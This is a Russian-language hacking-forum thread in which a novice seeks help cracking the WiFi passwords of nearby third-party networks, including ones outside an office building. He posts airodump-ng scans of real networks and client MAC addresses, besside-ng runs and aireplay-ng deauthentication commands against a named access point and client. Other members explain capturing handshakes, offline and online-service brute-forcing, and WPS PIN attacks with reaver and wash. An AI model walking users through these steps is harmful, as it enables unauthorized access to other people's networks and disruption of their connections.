Проблемы с перехватом хендшейка

Discussion in 'Песочница' started by Василий-Шишкин, 11 May 2015.

  1. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Добрый вечер.
    В первые пробую взломать пороль WiFi, установил ОС Kali Linux, работаю на ноутбуке от Lenovo G50-30.
    Прочитал статью по ссылке (тоже на этом форуме), и много других.
    Что я делал:
    - подключил WiFi адаптер Alfa AWUS036H.
    - переключил в режим мониторинга:
    Code:
    root@kali-Linux:~# airodump-ng mon0
    
     CH  3 ][ Elapsed: 4 s ][ 2015-05-11 19:29   
       
     BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
       
     BC:F6:85:BF:C0:E6  -59  2  0  0  4  54e  WPA  CCMP  PSK  Kira-
     10:BF:48:E6:55:18  -70  4  0  0  6  54e  WPA2 CCMP  PSK  Roofl
     B0:B2:DC:DC:C5:59  -63  3  0  0  8  54e  WPA2 CCMP  PSK  Archi
     D4:21:22:53:CE:65  -76  6  0  0  8  54e  WPA2 CCMP  PSK  MGTS_
     B0:B2:DC:DC:C5:58  -67  11  0  0  8  54e  WPA2 CCMP  PSK  Archi
     60:A4:4C:DE:45:48  -74  2  0  0  4  54e  WPA2 CCMP  PSK  ASUS
     C0:C1:C0:48:76:8F  -74  2  0  0  2  54e. WPA2 CCMP  PSK  Alati
     60:A4:4C:A2:B7:F8  -65  2  0  0  13  54e  WPA2 CCMP  PSK  TAGNA
     00:14:D1:A5:4A:95  -67  2  0  0  11  54e. WPA2 CCMP  PSK  SPIDE
     D8:50:E6:D7:39:60  -67  12  3  0  6  54e  WPA2 CCMP  PSK  Anako
     00:22:15:71:2A:E5  -59  20  3  0  6  54  WPA  TKIP  PSK  WL520
     00:1C:F0:3B:C3:05  -66  18  4  1  6  54 . WPA  TKIP  PSK  dlink
     C4:6E:1F:D5:AE:8A  -71  2  0  0  6  54e. WPA2 CCMP  PSK  TP-LI
     90:E6:BA:F1:6C:30  -57  3  2  0  6  54  WPA2 CCMP  PSK  proje
     00:25:9C:F7:36:85  -53  21  0  0  9  54e. WPA2 CCMP  PSK  Port
     D4:21:22:99:45:61  -75  3  0  0  1  54e  WPA2 CCMP  PSK  MGTS_
     00:17:9A:84:FD:45  -71  3  0  0  3  54 . WPA2 CCMP  PSK  2b4A9
     C2:9F:DB:F7:43:B4  -69  0  3  0  1  -1  OPN  <leng
    
    - затем перещел к перехвату хендшейка (проблема сразу выявилась): на форуме Античат и на других всегда при взломе были определены клиенты (station), а у меня это не происходило вообще вот что у меня показывало:
    Code:
    root@kali-Linux:~# airodump-ng mon0
    
     CH  5 ][ Elapsed: 1 min ][ 2015-05-11 20:49 ][ display sta only   
     
     BSSID  STATION  PWR  Rate  Lost  Frames  Probe   
       
     (not associated)  14:36:C6:AB:6C:94  -73  0 - 1  0  1   
     (not associated)  00:C0:CA:81:EC:0E  0  0 - 1  0  7   
     (not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  39   
     (not associated)  18:00:2D:8A:FE:6D  -61  0 - 1  0  1   
     (not associated)  80:EA:96:C9:25:9B  -65  0 - 1  0  14   
     (not associated)  AC:7F:3E:6B:AA:7F  -67  0 - 1  0  1   
     (not associated)  30:10:B3:A2:C9:73  -69  0 - 1  0  9   
     (not associated)  6C:B7:F4:AE:BC:42  -69  0 - 1  0  3  YOTA   
     (not associated)  A8:BB:CF:A9:90:D4  -73  0 - 1  0  1   
     (not associated)  A8:BB:CF:C8:DB:F1  -73  0 - 1  0  1   
     (not associated)  00:21:63:80:CD:12  -73  0 - 1  0  1   
     (not associated)  80:56:F2:03:33:97  -71  0 - 1  38  4   
     (not associated)  B0:10:41:02:4E:57  -75  0 - 1  0  1  Rooflux   
     (not associated)  F0:24:75:D4:91:DB  -75  0 - 1  0  1   
     (not associated)  B0:10:41:DD:97:92  -79  0 - 1  0  6   
     (not associated)  44:6D:57:BE:2D:4B  -81  0 - 1  0  1  UPVEL UR-325BN   
     (not associated)  6C:3E:6D:65:9C:CA  -81  0 - 1  0  1   
     (not associated)  BC:92:6B:1C:06:D3  -69  0 - 1  0  2   
     (not associated)  BC:CF:CC:8E:95:44  -73  0 - 1  0  1   
     (not associated)  44:6D:57:3A:1E:B1  -69  0 - 1  0  1  asunto   
     (not associated)  C0:18:85:4D:22:53  -77  0 - 1  0  1   
     (not associated)  C0:64:C6:4F:25:48  -75  0 - 1  0  1   
     (not associated)  90:48:9A:35:39:5F  -73  0 - 1  0  3   
     (not associated)  54:EF:92:23:C7:30  -29  0 - 1  0  5 
    
    как видно в коде к любому клиенту пишет not associated.
    - С начало подумал, что для besside-ng все равно, но оказалось нет.
    Вот что я увидел:
    Code:
    root@kali-Linux:~# besside-ng mon0
    [20:04:44] Let's ride
    [20:04:44] Resuming from besside.log
    [20:04:44] Appending to wpa.cap
    [20:04:44] Appending to wep.cap
    [20:04:44] Logging to besside.log
    [20:05:00] TO-OWN [nbn-78*, MGTS_GPON_9228*, Alatin_Home*, Kira-WiFi*, Sashko*, tax*, Rooflux_5*, UPVEL UR-325BN*, 2b4A9Z72*, dlink*, Ali-1*, ASUS*, Rooflux*, Anakonda38*, WL520GC_1q1J*, ASUS1*, internetanet*, Port Royal*, ahalaimahalai*, Archiv_guest*, Archiv*, ASUS*, MGTS_GPON_4889*, YOTA*, Mgts_75*, WirelessNet*, SPIDER MAN*, asunto*, homezone*, WirelessNet*, project*, TAGNANG*, mgts87*, INGERSOLL*, ZyXEL_KEENETIC_4G_FCD75C*, TP-LINK_D5AE8A*, mgts98*, MGTS_1232470*, Kanadci*] OWNED []
    [20:05:03] Crappy connection - nbn-78 unreachable got 0/10 (100% loss) [-73 dbm]
    [20:05:07] Crappy connection - MGTS_GPON_9228 unreachable got 0/10 (100% loss) [-65 dbm]
    [20:05:08] Crappy connection - Alatin_Home unreachable got 1/10 (90% loss) [-69 dbm]
    [20:05:42] Crappy connection - Rooflux_5 unreachable got 2/10 (80% loss) [-73 dbm]
    [20:05:45] Crappy connection - UPVEL UR-325BN unreachable got 2/10 (80% loss) [-73 dbm]
    [20:06:09] Crappy connection - Ali-1 unreachable got 1/10 (90% loss) [-75 dbm]
    [20:07:02] Crappy connection - internetanet unreachable got 0/10 (100% loss) [-73 dbm]
    [20:07:14] Crappy connection - ahalaimahalai unreachable got 0/10 (100% loss) [-69 dbm]
    [20:08:39] Crappy connection - asunto unreachable got 0/10 (100% loss) [-75 dbm]
    [20:08:51] Crappy connection - WirelessNet unreachable got 0/10 (100% loss) [-83 dbm]
    [20:09:25] Crappy connection - INGERSOLL unreachable got 0/10 (100% loss) [-73 dbm]
    [20:09:56] Crappy connection - MGTS_1232470 unreachable got 0/10 (100% loss) [-73 dbm]
    [20:10:07] Crappy connection - 261fa8 unreachable got 0/10 (100% loss) [-75 dbm]
    [20:10:19] Crappy connection - MKNet unreachable got 0/10 (100% loss) [-71 dbm]
    [20:10:30] Crappy connection - Sakura unreachable got 0/10 (100% loss) [-79 dbm]
    [20:10:53] Crappy connection - Slon unreachable got 0/10 (100% loss) [-75 dbm]
    [20:10:56] Crappy connection - NETGEAR38 unreachable got 0/10 (100% loss) [-77 dbm]
    [20:10:57] Crappy connection - Homenet unreachable got 0/10 (100% loss) [-75 dbm]
    [20:11:01] Crappy connection - DIR-620 unreachable got 1/10 (90% loss) [-76 dbm]
    [20:11:24] Crappy connection - Proton Wi-Fi unreachable got 0/10 (100% loss) [-73 dbm]
    [20:11:27] Crappy connection -  unreachable got 0/10 (100% loss) [-75 dbm]
    [20:11:28] Crappy connection - onlime-109 unreachable got 0/10 (100% loss) [-75 dbm]
    [20:11:32] Crappy connection - 14 unreachable got 0/10 (100% loss) [-69 dbm]
    
    С первого взгляда кажется, что все "ок", однако решил проверить качество пойманого хендшейка, перешел в папку wep.cap и wireshark пишет :
    через aircrack-ng, но все равно ни чего не вышло:
    Code:
    root@kali-Linux:~# aircrack-ng /wep.cap
    Opening /wep.cap
    read(file header) failed: Success
    Read 0 packets.
    
    No networks found, exiting.
    
    Quitting aircrack-ng...
    
    - снова перешел к airodump-ng, попробовал:
    Code:
    root@kali-Linux:~# airodump-ng --bssid CC:5D:4E:DA:11:C8 -c1 -w hachthis mon0
    
     CH  1 ][ Elapsed: 59 mins ][ 2015-05-11 20:02 ][ fixed channel mon0: -1   
       
     BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
       
     CC:5D:4E:DA:11:C8  -60  0  5500  417  0  1  54e  WPA2 CCMP  PSK  Sashko   
       
     BSSID  STATION  PWR  Rate  Lost  Frames  Probe
    
    в этоже время пробовал откдючвть клиентов:
    Code:
    root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 mon0
    21:08:34  Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
    21:08:34  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
    Please specify an ESSID (-e).
    root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 -e Sashko mon0
    21:08:41  Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1
    21:08:41  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
    
    - снова ни чего не вышло, только других способов больше не знаю.
    В чем ошибка ума не приложу, весь русские и английские форумы и статьи прочитал и облазил, полностю в ТУПИКЕ.
    Заранее благодарен.
     
  2. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    189
    Reputations:
    57
    Не внимательно читаешь скорее всего раз не понимаешь для чего ты команды вводишь.
    Может видео поможет..
     
  3. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    на английском возможно, что много пропустил, так как не владею английским на 100%. Поэтому очень даже может быть.
    А видео я почти не смотрел, спасибо
     
    #3 Василий-Шишкин, 11 May 2015
    Last edited: 11 May 2015
  4. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    т.е. я правельно понимаю, что хендшейк нужен, чтобы взломать с помощью reaver, а если брутом то он вовсе не нужен?
     
  5. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    189
    Reputations:
    57
    Handshake как раз таки нужен для брута.Что бы проще тебе было понять - Handshake - это момент рукопожатия между точкой и клиентом(момент когда клиент передает пароль точке в шифрованном виде)А брут - это процес перебора(как бы угадать пароль из словаря в котором он может быть) пароля.Если у нас не будет handshake-a то нам не будет что брутит.Понимаешь?
    А reaver - это другое кино... REAVER это утилита для перебора ПИНов когда роутер уязвим по протоколу WPS(WIireless Protected Setup).Здесь как раз таки handshake не нужен.В вардрайвинге есть такой приоритет взлома,что если есть WPS то сначала ломается он а аж потом брут если первый этап не даст результатов так как WPS ломается быстрее и проще.А прежде чем ломать WPS стоит проверить наличия ПИНа от роутера на наличие в списке стандартных пинов http://k0derz.ru/база-wps-pin-кодов/.
    Проверить есть ли на роутере WPS можно утилитой wash в Kali Linux на пример так:
    Code:
     wash -i mon0 
     
  6. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    И опять же у этого парня (девушки) в видео сразу поймал клиентов, которые подключены к тому или иному wifi -ю. А у меня этого не происходит. Вот поэтому я сюда и обратился. Как это исправить?
     
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    нет не правельно
     
  8. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Вот сегодня вышел "прогуляться" и около офисного здания попробовал снова, что получится:
    Code:
    CH  4 ][ Elapsed: 44 s ][ 2015-05-12 07:13 ][ display sta only
    
    BSSID  STATION  PWR  Rate  Lost  Frames  Probe
    
    (not associated)  5C:93:A2:9E:E2:07  -67  0 - 1  0  1
    (not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  13
    (not associated)  00:C0:CA:81:EC:0E  4  0 - 1  0  4
    (not associated)  1C:7B:21:97:E5:A2  -57  0 - 1  0  5
    (not associated)  C0:64:C6:4F:F2:B0  -63  0 - 1  134  15  HOME_5_GHz,ASUS_5G,33RUS
    (not associated)  58:12:43:BB:AD:90  -65  0 - 1  0  2
    (not associated)  AC:22:0B:21:62:BB  -63  0 - 5  3622  593  AVK119,ASUS,HP-Print-32-Deskjet 3520 series,default,Smart_box-CEB676_guest,onlime
    (not associated)  34:08:04:32:FF:2A  -67  0 - 1  0  2
    (not associated)  00:1F:3C:B1:EB:0E  -67  0 - 1  0  5
    (not associated)  48:59:29:F6:D3:1E  -67  0 - 1  0  3
    (not associated)  74:2F:68:83:F1:60  -69  0 - 1  32  9
    (not associated)  90:A4:DE:5E:ED:47  -69  0 - 1  0  4
    (not associated)  C4:42:02:E1:55:CD  -69  0 - 1  0  15  KafeBryans,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.Т
    (not associated)  88:63:DF:2A:FE:0E  -69  0 - 1  0  1  slnkv
    (not associated)  BC:F5:AC:9E:9A:D9  -69  0 - 1  0  1
    (not associated)  00:26:C7:03:22:B8  -69  0 - 1  0  10
    (not associated)  38:63:F6:06:30:52  -71  0 - 1  0  3
    (not associated)  B0:65:BD:99:BD:AC  -71  0 - 1  0  4  mwmp,wmp
    (not associated)  00:25:D3:6B:0B:CF  -71  0 - 1  0  1
    (not associated)  F0:7B:CB:95:48:79  -71  0 - 1  0  1  dlink
    (not associated)  68:17:29:F1:A7:B1  -71  0 - 1  35  4
    (not associated)  C4:85:08:3C:AD:07  -71  0 - 1  76  2  Normanykt
    (not associated)  DC:85:DE:8A:A5:31  -73  0 - 1  34  6
    (not associated)  68:94:23:24:92:9A  -63  0 - 1  96  48  AP-SGP
    (not associated)  9C:2A:70:1A:E2:89  -73  0 - 1  38  12  Artur
    (not associated)  F0:F6:1C:2D:FE:87  -73  0 - 1  0  1
    (not associated)  40:0E:85:3A:72:E3  -73  0 - 1  0  1  sshipulin_guest
    (not associated)  1C:B0:94:C7:4D:8A  -73  0 - 1  0  5  TRENDnet651
    (not associated)  50:B7:C3:DE:87:2D  -75  0 - 1  0  1
    (not associated)  7C:E9:D3:B0:05:16  -75  0 - 1  91  16  AP-SGP
    
    
    CH  1 ][ Elapsed: 48 s ][ 2015-05-12 07:13 ][ display sta only
    
    BSSID  STATION  PWR  Rate  Lost  Frames  Probe
    
    (not associated)  18:F4:6A:33:37:83  -67  0 - 1  0  1
    (not associated)  00:C0:CA:81:EC:0E  4  0 - 1  0  4
    (not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  13
    (not associated)  1C:7B:21:97:E5:A2  -57  0 - 1  0  5
    (not associated)  C0:64:C6:4F:F2:B0  -63  0 - 1  0  15  HOME_5_GHz,
    (not associated)  68:94:23:24:92:9A  -63  0 - 1  0  48  AP-SGP
    (not associated)  00:E1:85:09:01:1C  -65  0 - 1  2  3
    (not associated)  58:12:43:BB:AD:90  -65  0 - 1  0  2
    (not associated)  AC:22:0B:21:62:BB  -65  0 - 5  1873  679  AVK119,ASUS
    (not associated)  5C:93:A2:9E:E2:07  -67  0 - 1  0  1
    (not associated)  34:08:04:32:FF:2A  -67  0 - 1  0  2
    (not associated)  00:1F:3C:B1:EB:0E  -67  0 - 1  0  5
    (not associated)  48:59:29:F6:D3:1E  -67  0 - 1  0  3
    (not associated)  74:2F:68:83:F1:60  -69  0 - 1  0  9
    (not associated)  90:A4:DE:5E:ED:47  -69  0 - 1  0  4
    (not associated)  C4:42:02:E1:55:CD  -69  0 - 1  0  15  KafeBryans,
    (not associated)  88:63:DF:2A:FE:0E  -69  0 - 1  0  1  slnkv
    (not associated)  BC:F5:AC:9E:9A:D9  -69  0 - 1  0  1
    
    
    CH 13 ][ Elapsed: 1 min ][ 2015-05-12 07:14 ][ display sta only
    
    BSSID  STATION  PWR  Rate  Lost  Frames  Probe
    
    (not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  26
    (not associated)  00:C0:CA:81:EC:0E  0  0 - 1  0  8
    (not associated)  1C:7B:21:97:E5:A2  -57  0 - 1  0  5
    (not associated)  00:E1:85:09:01:1C  -61  0 - 1  51  5
    (not associated)  C0:64:C6:4F:F2:B0  -63  0 - 1  0  15  HOME_5_GHz,ASUS_5G,33RUS
    (not associated)  1C:B0:94:C7:4D:8A  -63  0 - 1  0  8  TRENDnet651
    (not associated)  AC:22:0B:21:62:BB  -67  0 - 5  1128  987  AVK119,ASUS,HP-Print-32-Deskjet 3520 series,default,Smart_box-CEB676_guest,onlime
    (not associated)  58:12:43:BB:AD:90  -65  0 - 1  0  2
    (not associated)  18:F4:6A:33:37:83  -67  0 - 1  0  1
    (not associated)  5C:93:A2:9E:E2:07  -67  0 - 1  0  1
    (not associated)  34:08:04:32:FF:2A  -67  0 - 1  0  2
    (not associated)  00:1F:3C:B1:EB:0E  -67  0 - 1  0  5
    (not associated)  48:59:29:F6:D3:1E  -67  0 - 1  0  3
    (not associated)  68:94:23:24:92:9A  -67  0 - 1  30  61  AP-SGP
    (not associated)  00:26:C7:03:22:B8  -67  0 - 1  30  14
    (not associated)  9C:2A:70:1A:E2:89  -67  0 - 1  80  20  Artur
    (not associated)  74:2F:68:83:F1:60  -67  0 - 1  16  16
    (not associated)  B4:52:7E:92:A2:49  -69  0 - 1  0  1
    (not associated)  90:A4:DE:5E:ED:47  -69  0 - 1  0  4
    (not associated)  C4:42:02:E1:55:CD  -69  0 - 1  0  15  KafeBryans,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.Т
    (not associated)  88:63:DF:2A:FE:0E  -69  0 - 1  0  1  slnkv
    (not associated)  00:26:AB:61:C2:54  -69  0 - 1  42  33  Screen
    (not associated)  B0:5C:E5:C2:0E:24  -71  0 - 1  0  1
    (not associated)  00:08:CA:28:82:C1  -71  0 - 1  0  6
    (not associated)  1C:4B:D6:DE:76:AA  -71  0 - 1  0  3
    (not associated)  38:63:F6:06:30:52  -71  0 - 1  0  3
    (not associated)  B0:65:BD:99:BD:AC  -71  0 - 1  0  4  mwmp,wmp
    (not associated)  00:25:D3:6B:0B:CF  -71  0 - 1  0  1
    (not associated)  F0:7B:CB:95:48:79  -71  0 - 1  0  1  dlink
    (not associated)  68:17:29:F1:A7:B1  -71  0 - 1  0  4
    
    снова тоже самое 1000-и клиентов и ни один человек не подключен к точки доступа. Как так?
    Каким образом aireplay-ng будет отключать клиентов, если он их даже не видет, или besside-ng, получается без клиентов у меня нет шансов взломать пороль WiFi?
     
    #8 Василий-Шишкин, 12 May 2015
    Last edited: 12 May 2015
  9. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Спасибо, с этим я уже разобрался, вот с клиентами нет
     
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    что с ними не так ?
     
  11. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Одного клиента спустя 2 дня поиска наконец то обнаружил:
    Code:
     CH 10 ][ Elapsed: 51 min ][ 2015-05-12 07:45   
       
     BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
       
     2C:AB:25:0B:B5:1C  -1  0  0  0  -1  -1  <length:  0>   
     B0:B2:DC:88:29:54  -1  0  0  0  -1  -1  <length:  0>   
     00:11:24:98:61:E8  -1  0  0  0  -1  -1  <length:  0>   
     64:66:B3:53:F9:6C  -1  0  0  0  -1  -1  <length:  0>   
     1C:BD:B9:2B:E6:00  -28  3  0  0  6  54e. WPA2 CCMP  PSK  Indiweed   
    -------- 20:CF:30:D6:46:DB  -64  34  0  0  12  54e  WPA2 CCMP  PSK  JackVorobey   
     EE:43:F6:03:F5:A8  -53  132  13  0  9  54e  WPA2 CCMP  PSK  <length:  0>   
     F4:6D:04:7D:88:07  -58  79  3  0  6  54  WPA2 TKIP  PSK  smirnoff   
     10:FE:ED:4A:3F:E2  -57  124  8  0  4  54e. WPA2 CCMP  PSK  Imgnp   
     00:18:E7:FC:95:80  -57  69  0  0  13  54 . WPA2 CCMP  PSK  gersan3   
     CC:5D:4E:FE:1C:E8  -59  83  0  0  11  54e  WPA2 CCMP  PSK  Gosp   
     EC:43:F6:DD:12:DC  -63  37  1  0  4  54e  WPA2 CCMP  PSK  Keenetic-7833   
     F4:6D:04:C3:B9:14  -60  72  0  0  6  54e  WPA2 CCMP  PSK  Vandam   
     54:A0:50:DD:40:DC  -60  24  2  0  1  54e  WPA2 CCMP  PSK  wifi513   
     10:BF:48:E6:42:AF  -61  47  1  0  6  54e  WPA2 CCMP  PSK  ASUS   
     F8:C0:91:25:A9:88  -61  46  0  0  13  54e  WPA2 CCMP  PSK  Upvel   
     D8:5D:4C:D6:14:92  -63  47  3  0  7  54e. WPA2 CCMP  PSK  FreeWiFi   
     78:24:AF:7E:A3:5C  -64  46  3  0  6  54e  WPA2 CCMP  PSK  ASUS   
     D8:50:E6:AF:48:40  -64  20  3  0  6  54e  WPA2 CCMP  PSK  Olimpiya   
     20:4E:7F:51:4A:FE  -62  75  0  0  3  54e. WPA2 CCMP  PSK  makap   
     14:DA:E9:79:B6:7C  -64  23  0  0  13  54e  OPN  MrBoshi   
     52:68:9D:EA:FD:F0  -65  32  0  0  1  54e. WPA2 CCMP  PSK  10-11b   
     1C:7E:E5:92:EA:6C  -65  6  0  0  1  54e  WPA2 CCMP  PSK  DIR-620 1   
     38:1C:1A:2E:93:E0  -65  25  0  0  6  54e. WPA2 CCMP  MGT  bmstu_student   
     64:70:02:CA:3D:E2  -65  13  0  0  11  54e. WPA2 CCMP  PSK  Service   
     14:DA:E9:F8:FA:A4  -65  4  0  0  13  54e  WPA2 CCMP  PSK  rb1   
     00:23:54:73:99:D2  -66  7  1  0  9  54  WPA2 CCMP  PSK  Asus   
     38:1C:1A:2E:93:E2  -67  21  0  0  6  54e. OPN  bmstu_staff   
     D4:BF:7F:01:78:B8  -67  17  0  0  9  54e  WPA2 CCMP  PSK  514KZ   
     D4:BF:7F:01:B4:48  -67  11  0  0  9  54e  WPA2 CCMP  PSK  PUSSY 
    
    
    
     CH 12 ][ Elapsed: 28 s ][ 2015-05-12 07:45 ][ display sta only   
       
     BSSID  STATION  PWR  Rate  Lost  Frames  Probe   
       
     (not associated)  00:C0:CA:81:EC:0E  0  0 - 1  0  4   
     (not associated)  9C:8E:99:08:14:34  -57  0 - 1  33  37  UI.RU-IU.RU
     (not associated)  88:70:8C:14:8A:B2  -55  0 - 1  5  4   
     (not associated)  A4:EE:57:6F:C7:A3  -55  0 - 1  42  14   
     (not associated)  6C:40:08:DC:81:7F  -57  0 - 1  22  2   
     (not associated)  00:81:6A:3B:4F:81  -63  0 - 1  0  3   
     (not associated)  24:FD:52:B5:2E:CC  -65  0 - 1  0  3   
     (not associated)  24:0A:64:B6:8C:EB  -65  0 - 1  0  7   
     (not associated)  DC:85:DE:25:8B:1A  -67  0 - 1  0  1  ASUS   
     (not associated)  24:0A:64:B1:72:9B  -69  0 - 1  0  1   
     (not associated)  74:F0:6D:75:72:74  -71  0 - 1  0  1   
     (not associated)  94:39:E5:53:A3:F7  -71  0 - 1  49  2   
     20:CF:30:D6:46:DB  9C:AD:97:4D:37:19  0  0 - 1  5  173 
    
    Снова пробую перехватить:
    Code:
    CH 1 ] [ Elapsed: 33 mins ][ 2015-05-12 07:56   
       
     BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
       
     20:CF:30:D6:46:DB  -65  323  0  0  12  54e  WPA2 CCMP  PSK  JackV
       
     BSSID  STATION  PWR  Rate  Lost  Frames  Probe   
     
    
    одновременно пробую отключить клиента :
    Code:
    root@kali-Linux:~# aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0
    07:55:13  Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1
    07:55:13  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
    Please specify an ESSID (-e).
    
    Снова не получается.
     
  12. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Не могу отключить их пишет:
    Code:
    root@kali-Linux:~# aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0
    07:55:13  Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1
    07:55:13  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
    Please specify an ESSID (-e).
    
    если добовляю essid, то:
    Code:
    root@kali-Linux:~# aireplay-ng --deauth 5 -e JackVorobey -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0
    08:02:06  Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1
    08:02:06  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
    
     
  13. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    --ignore-negative-one для кого эта строчка?
     
  14. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Это и есть мой вопрос, почему он не хочет отключить клиента, а выдает какое-то "Г"?
    --ignore-negative-one - сам не знаю что такое
    вот что выдает help к команде aireplay-ng:
    Code:
    root@kali-Linux:~# aireplay-ng --help
    
      Aireplay-ng 1.2 rc1 - (C) 2006-2013 Thomas d'Otreppe
      http://www.aircrack-ng.org
    
      usage: aireplay-ng <options> <replay interface>
    
      Filter options:
    
      -b bssid  : MAC address, Access Point
      -d dmac  : MAC address, Destination
      -s smac  : MAC address, Source
      -m len  : minimum packet length
      -n len  : maximum packet length
      -u type  : frame control, type  field
      -v subt  : frame control, subtype field
      -t tods  : frame control, To  DS bit
      -f fromds : frame control, From  DS bit
      -w iswep  : frame control, WEP  bit
      -D  : disable AP detection
    
      Replay options:
    
      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac  : set Destination  MAC address
      -h smac  : set Source  MAC address
      -g value  : change ring buffer size (default: 8)
      -F  : choose first matching packet
    
      Fakeauth attack options:
    
      -e essid  : set target AP SSID
      -o npckts : number of packets per burst (0=auto, default: 1)
      -q sec  : seconds between keep-alives
      -Q  : send reassociation requests
      -y prga  : keystream for shared key auth
      -T n  : exit after retry fake auth request n time
    
      Arp Replay attack options:
    
      -j  : inject FromDS packets
    
      Fragmentation attack options:
    
      -k IP  : set destination IP in fragments
      -l IP  : set source IP in fragments
    
      Test attack options:
    
      -B  : activates the bitrate test
    
      Source options:
    
      -i iface  : capture packets from this interface
      -r file  : extract packets from this pcap file
    
      Miscellaneous options:
    
      -R  : disable /dev/rtc usage
      --ignore-negative-one : if the interface's channel can't be determined,
      ignore the mismatch, needed for unpatched cfg80211
    
      Attack modes (numbers can still be used):
    
      --deauth  count : deauthenticate 1 or all stations (-0)
      --fakeauth  delay : fake authentication with AP (-1)
      --interactive  : interactive frame selection (-2)
      --arpreplay  : standard ARP-request replay (-3)
      --chopchop  : decrypt/chopchop WEP packet (-4)
      --fragment  : generates valid keystream  (-5)
      --caffe-latte  : query a client for new IVs  (-6)
      --cfrag  : fragments against a client  (-7)
      --migmode  : attacks WPA migration mode  (-8)
      --test  : tests injection and quality (-9)
    
      --help  : Displays this usage screen
    
    почти в самом конце
    Как можно исправить?
     
  15. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    под твоей темой специально для тебя скопировал статью
     
  16. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Я недавно в Античат, не знаю где это "под темой" можно ссылку или просто вставить(как сообщение)?
     
  17. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Если я перехватил отличный хендшейк, я могу например брутить его дома или мне обязательно быть в зоне действия роутера.
    Спрашиваю, потому что Вы говорите брутить хендшейк, тогда зачем соединение с роутером, по идее можно его про брутить узнать пороль и просто приходить на то место и подключаться к нему, можно так?
    Если так, то было б велеколепно я с планшетным ноутбуком по перехватываю хендшейки, а дома с "крутой" быстрой и мощной видеокартой про брутю все хендшейки, а с ноутбуком я 10 лет взламывать буду)
     
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    Где хочешь там и брути, можешь в инете брутить, есть спец сервисы
     
  19. Василий-Шишкин

    Joined:
    9 May 2015
    Messages:
    51
    Likes Received:
    0
    Reputations:
    1
    Это очень хорошая информация, только хендшейк перехватить не получается.
    Вы говорили про статью, подскажите, где она.
     
  20. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    http://forum.antichat.ru/threads/425082/
     
Loading...